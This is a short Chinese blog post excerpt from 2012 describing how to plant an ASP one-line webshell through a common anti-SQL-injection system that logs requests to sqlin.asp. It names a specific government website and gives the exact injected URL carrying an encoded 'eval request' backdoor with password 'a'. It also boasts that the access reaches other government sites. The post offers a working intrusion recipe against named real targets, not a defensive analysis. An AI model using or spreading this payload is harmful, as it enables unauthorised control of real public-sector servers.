直接给asp防注入getwebshell
摘要:
这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾可在http://pzzl.gov.cn/sqlin.asp写入一句话,密码a连接上去可以看到另外的几个政府网站 阅读全文
posted @ 2012-07-13 11:44 =_=! 阅读(367) 评论(2) 推荐(0)
浙公网安备 33010602011771号